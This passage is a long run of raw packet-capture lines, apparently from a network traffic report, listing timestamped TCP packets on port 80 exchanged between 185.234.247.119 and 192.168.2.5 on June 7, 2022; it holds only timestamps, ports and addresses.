                                                                                                                                                                                            Jun 7, 2022 19:51:26.549572945 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.549592018 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.549609900 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.549627066 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.549645901 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.549662113 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.549670935 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.549679995 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.549698114 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.549705029 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.549710035 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.549712896 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.549715996 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.549734116 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.549735069 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.549748898 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.549751997 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.549768925 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.549777985 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.549787998 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.549837112 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.549849033 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.549865961 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.549882889 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.549912930 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.549928904 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.549931049 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.549949884 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.549968004 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.549973965 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.549978971 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.549985886 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.550003052 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.550021887 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.550048113 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.550085068 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.550117016 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.550134897 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.550153971 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.550173998 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.550193071 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.550198078 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.550209999 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.550228119 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.550230026 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.550246000 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.550263882 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.550282955 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.550285101 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.550291061 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.550301075 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.550318003 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.550318003 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.550335884 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.550352097 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.550353050 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.550370932 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.550390005 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.550407887 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.550425053 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.550431013 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.550438881 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.550442934 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.550461054 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.550467014 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.550478935 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.550502062 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.550554991 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.578624010 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.578679085 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.578716040 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.578747034 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.578752995 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.578792095 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.578809023 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.578830004 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.578869104 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.578872919 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.578905106 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.578943014 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.578957081 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.578982115 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.579018116 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.579032898 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.579055071 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.579091072 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.579099894 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.579127073 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.579164982 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.579194069 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.579200983 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.579237938 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.579242945 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.579274893 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.579310894 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.579319954 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.579349041 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.579385042 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.579397917 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.579421043 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.579448938 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.579492092 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.579530954 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.579560041 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.579567909 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.579605103 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.579607010 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.579636097 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.579646111 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.579680920 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.579696894 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.579716921 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.579752922 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.579760075 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.579787970 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.579826117 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.579837084 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.579862118 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.579900026 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.579919100 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.579936981 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.579972982 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.579982042 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.580008984 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.580045938 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.580060959 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.580081940 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.580117941 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.580123901 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.580153942 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.580204964 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.580214024 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.580243111 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.580279112 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.580297947 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.580316067 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.580352068 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.580382109 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.580388069 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.580430031 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.608206987 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.608268023 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.608309984 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.608350992 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.608351946 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.608392000 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.608417034 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.608433008 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.608495951 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.608505011 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.608552933 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.608593941 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.608618021 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.608633995 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.608673096 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.608680964 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.608714104 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.608757019 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.608757019 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.608795881 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.608836889 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.608843088 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.608876944 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.608916998 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.608926058 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.608957052 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.608997107 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.609004021 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.609038115 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.609078884 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.609082937 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.609117985 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.609158039 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.609162092 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.609198093 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.609244108 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.610490084 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.610537052 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.610575914 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.610629082 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.611443043 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.611488104 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.611521959 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.611527920 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.611568928 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.611579895 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.611610889 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.611650944 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.611676931 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.612998009 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.613042116 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.613084078 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.613095045 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.613125086 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.613141060 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.613166094 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.613207102 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.613214970 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.613965988 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.614007950 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.614042044 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.614048004 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.614090919 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.614100933 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.614129066 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.614177942 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.615639925 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.615680933 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.615721941 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.615761995 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.615792036 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.615813971 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.615842104 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.638207912 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.638281107 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.638354063 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.638362885 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.638411999 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.638498068 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.638591051 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.638643980 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.638793945 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.638909101 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.638958931 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.639019012 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.639162064 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.639214039 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.639273882 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.639316082 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.639358044 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.639377117 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.639398098 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.639445066 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.639448881 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.639488935 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.639532089 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.639543056 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.639574051 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.639615059 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.639619112 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.639656067 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.639698982 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.639705896 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.639736891 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.639776945 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.639787912 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.639816999 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.639854908 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.639863968 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.639897108 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.639935970 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.639945984 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.639977932 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.640017986 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.640027046 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.640055895 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.640096903 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.640110016 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.640136957 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.640173912 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.640204906 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.640245914 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.640249014 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.640285969 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.640291929 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.640332937 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.640341043 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.640372038 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.640413046 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.640423059 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.640451908 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.640508890 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.640517950 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.640559912 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.640602112 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.640616894 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.640640020 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.640680075 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.640687943 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.640718937 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.640758991 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.640765905 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.640799046 CEST8049865185.234.247.119192.168.2.5
